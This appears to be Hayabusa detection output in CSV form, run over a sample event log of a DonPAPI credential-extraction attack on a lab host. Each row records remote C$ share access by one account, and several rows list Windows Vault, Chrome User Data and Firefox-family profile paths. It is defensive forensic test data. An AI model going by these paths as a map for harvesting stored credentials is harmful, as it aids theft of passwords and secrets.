+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
